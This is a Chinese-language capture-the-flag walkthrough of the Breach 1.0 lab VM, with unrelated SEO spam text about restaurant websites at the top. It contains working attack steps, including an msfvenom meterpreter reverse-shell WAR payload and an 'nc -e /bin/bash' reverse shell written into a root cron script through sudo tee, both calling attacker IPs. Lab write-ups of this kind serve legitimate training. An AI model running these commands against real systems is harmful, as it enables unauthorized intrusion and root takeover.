餐饮网站建设怎样psd网站首页图片

餐饮网站建设怎样,psd网站首页图片,建设英文网站要求,重庆的互联网公司这次做一个Vulhub 实战靶场 Breach1.0 参考学习#xff1a; https://www.cnblogs.com/sym945/p/13604758.html 前言 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址#xff08;192.168.110.140#xff09;#xff0c;需要将虚拟机网卡设…这次做一个Vulhub 实战靶场 Breach1.0参考学习 https://www.cnblogs.com/sym945/p/13604758.html前言Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。VM虚机配置有静态IP地址192.168.110.140需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。作者期待大家写出文章特别是通过非预期的方式获取root权限。环境配置启动虚拟机因为靶场虚机配置有静态IP地址192.168.110.140需要将虚拟机网卡设置为host-only仅主机的方式我将kali攻击机添加了一块虚拟网卡第二块网卡设置的网段跟虚拟机同一网段。开始实验下载好靶机并且启动知道了靶场环境的ip地址所以可以直接使用nmap扫描端口查询突破口但是扫描之后发现端口全是打开的显然是做了防端口扫描。根据靶场规律直接访问ip地址发现有http服务。查看网页源代码发现有一串base64加密的字符串。Base64解密连续解密两次echo Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo | base64 -dechocGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh| base64 -d解密结果如下pgibbons:damnitfeel$goodtobeagang$ta初次推断可能是账号和密码而且除了字符串源码里还有个文件地址打开访问发现另外的页面访问页面跳转到如下页面点击Employee portal进入到impresscms的登录界面。想到之前的base64解密结果pgibbons:damnitfeel$goodtobeagang$ta尝试用这个来登录可以登录成功页面如下使用命令searchsploit impresscms找到impresscms的/modules/profile/admin/field.php文件存在SQL注入漏洞想要利用但是发现没有权限访问该文件。那就回到网页看到有3个邮件消息看是否有提示信息。查看前两份邮件没有任何有用的信息直到第三份邮件发现了关键信息。第3封邮件主要内容有一个peter的SSL证书被保存在192.168.110.140/.keystore根据邮件提示到下载包含SSL证书的密钥库keystore文件keystore是存储公私密钥的一种文件格式下载下来保存好。点击home进入index.php再点击content在新界面里面发现了链接。点开提示的http://192.168.110.140/impresscms/modules/content/content.php?content_id1发现一个流量包文件下载下来。而且还有提示信息They told me the alias, storepassword and keypassword are all set to tomcat别名、Keystore密码、key密码都设置成tomcat。由此推测1)这是一个流量包文件不能读取很可能因为某些流量有SSL加密前面的邮件中提供了一个keystore这里提供了密码2)系统中可能存在tomcat。在下载了keystore文件的目录中打开终端输入命令keytool -list -keystore Untitled.keystore输入口令tomcat查看keystore密钥库中的证书。接下来从密钥库导出.p12证书将keystore拷贝到keytool目录导出名为tomcatkeystore.p12的证书输入命令keytool -importkeystore -srckeystore Untitled.keystore -destkeystore tomcatkeystore.p12 -deststoretype PKCS12 -srcalias tomcat将生成的tomcatkeystore.p12证书导入wireshark点击编辑--首选项--Protocols--TLS点击Edit编辑IPaddress填写192.168.110.140,Port填写8443Protocol填写httpKey File选择生成的tomcatkeystore.p12文件Password填写tomcat。分析浏览量数据包发现一个Unauthorized的认证包该request和response包含了Tomcat后台的登录地址https://192.168.110.140:8443/_Mnag3Me/html把信息提取出来tomcat:Tt\5D8F(#!*uG)4m7zB 可能是账号和密码https://192.168.110.140:8443/_Mnag3Me/html直接访问会显示建立安全连接失败这个时候需要打开burp suite但不开启拦截打开代理重新打开网页会出现登录框把之前tomcat:Tt\5D8F(#!*uG)4m7zB输入进去。成功登录到后台。有上传文件的功能可以生产一个木马文件msfvenom -p java/meterpreter/reverse_tcp lhost192.168.110.128 lport1234-f war -o shell.war使用msf 参数设置成自己刚刚设置的把shell.war上传到网站。上传成功后访问https://192.168.110.140:8443/shell/shell.jsp在msf下顺利拿到shell查看当前用户cat /etc/passwd 收集信息看到两个值得关注的账户。在/var/www/5446目录下看到两个文件名很特殊的文件。查看文件发现是mysql的数据库连接文件使用的root账户不需要密码。输入命令mysql -u root -p 进入mysql提示输入密码直接回车成功连接进入mysql数据库查看账号密码得到milton账户的密码哈希解密为:thelaststraw通过密码thelaststraw 来登录milton账户。退出mysql使用命令su milton输入密码成功登录milton账户账户milton目录下发现的some_script.sh脚本没有可利用的地方查看历史命令发现有切换到blumbergh这个账户的操作操作之后有切换到root的操作所以可能提权要进入到blumbergh这个账户。继续收集信息http://192.168.110.140/images/目录下找到6张图片milton用户目录下发现1张图片。使用exiftool工具查看图片输入命令exiftool bill.png 发现密码:coffeestains切换到blumbergh账户输入之前图片中得到的密码切换成功。进入blumbergh目录下查看blumbergh账户的历史命令发现/usr/share/cleanup目录下的tidyup.sh脚本文件。一样进入目录查看脚本为root账户才能读写的用来清理删除webapps目录下的文件的脚本。echo nc -e /bin/bash 192.168.110.122 2345 shell.txt将nc执行的反弹shell命令写入到shell.txt文件cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh使用tee命令将shell.txt内容输出到tidyup.sh打开另一个终端输入nc -lvvp 2345监听2345端口的动静等到一段时间成功接到root的shell。查看/root目录下有个flair.jpg的文件应该是最后的flag将文件再次复制到/var/www/html/images中查看图片成功得到flag。这个图片感觉不算是flag回到一开始的目录下。ls -a 发现有.flag.txt文件直接cat一下拿到flag这个才是真正的flag。结束